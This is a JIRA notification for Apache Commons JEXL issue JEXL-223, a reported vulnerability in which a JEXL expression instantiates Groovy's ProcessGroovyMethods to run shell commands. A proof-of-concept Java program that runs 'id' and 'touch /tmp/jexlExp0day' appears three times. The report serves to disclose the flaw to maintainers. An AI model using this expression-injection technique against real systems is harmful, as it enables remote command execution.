[jira] [Updated] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerabilitity

Fri, 21 Apr 2017 00:38:23 -0700 

     [ 
https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bruno P. Kinoshita updated JEXL-223:
------------------------------------
    Description: 
0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy.

0x02 POC
{code}
import java.io.IOException;
import java.util.List;

import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;

public class elExp {
        public static void main(String args[]) throws IOException {
                // Create or retrieve an engine
            JexlEngine jexl = new JexlBuilder().create();
            // Create an expression
            //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
            ProcessGroovyMethods n = new ProcessGroovyMethods();
            System.out.println(n.execute("id").toString());
            String jexlExp = 
"new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch 
/tmp/jexlExp0day\")";
            JexlExpression e = jexl.createExpression( jexlExp );
            try {
                
                        Process process = new ProcessBuilder("id").start();
                } catch (IOException e1) {
                        // TODO Auto-generated catch block
                        e1.printStackTrace();
                }
            // Create a context and add data
            JexlContext jc = new MapContext();
            jc.set("foo", jexlExp );
            
            // Now evaluate the expression, getting the result
            Object o = e.evaluate(jc);  
            System.out.println(o);
            }
}
{code}


  was:
0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy.

0x02 POC
import java.io.IOException;
import java.util.List;

import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;

public class elExp {
        public static void main(String args[]) throws IOException {
                // Create or retrieve an engine
            JexlEngine jexl = new JexlBuilder().create();
            // Create an expression
            //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
            ProcessGroovyMethods n = new ProcessGroovyMethods();
            System.out.println(n.execute("id").toString());
            String jexlExp = 
"new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch 
/tmp/jexlExp0day\")";
            JexlExpression e = jexl.createExpression( jexlExp );
            try {
                
                        Process process = new ProcessBuilder("id").start();
                } catch (IOException e1) {
                        // TODO Auto-generated catch block
                        e1.printStackTrace();
                }
            // Create a context and add data
            JexlContext jc = new MapContext();
            jc.set("foo", jexlExp );
            
            // Now evaluate the expression, getting the result
            Object o = e.evaluate(jc);  
            System.out.println(o);
            }
}



> Apache Commons JEXL Expression Execute Command Vulnerabilitity
> --------------------------------------------------------------
>
>                 Key: JEXL-223
>                 URL: https://issues.apache.org/jira/browse/JEXL-223
>             Project: Commons JEXL
>          Issue Type: Bug
>            Reporter: cnbird
>            Priority: Critical
>
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerabilitity throught 
> groovy.
> 0x02 POC
> {code}
> import java.io.IOException;
> import java.util.List;
> import org.apache.commons.jexl3.JexlBuilder;
> import org.apache.commons.jexl3.JexlContext;
> import org.apache.commons.jexl3.JexlEngine;
> import org.apache.commons.jexl3.JexlExpression;
> import org.apache.commons.jexl3.MapContext;
> import org.codehaus.groovy.runtime.ProcessGroovyMethods;
> public class elExp {
>       public static void main(String args[]) throws IOException {
>               // Create or retrieve an engine
>           JexlEngine jexl = new JexlBuilder().create();
>           // Create an expression
>           //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
>           ProcessGroovyMethods n = new ProcessGroovyMethods();
>           System.out.println(n.execute("id").toString());
>           String jexlExp = 
> "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch 
> /tmp/jexlExp0day\")";
>           JexlExpression e = jexl.createExpression( jexlExp );
>           try {
>               
>                       Process process = new ProcessBuilder("id").start();
>               } catch (IOException e1) {
>                       // TODO Auto-generated catch block
>                       e1.printStackTrace();
>               }
>           // Create a context and add data
>           JexlContext jc = new MapContext();
>           jc.set("foo", jexlExp );
>           
>           // Now evaluate the expression, getting the result
>           Object o = e.evaluate(jc);  
>           System.out.println(o);
>           }
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)

Reply via email to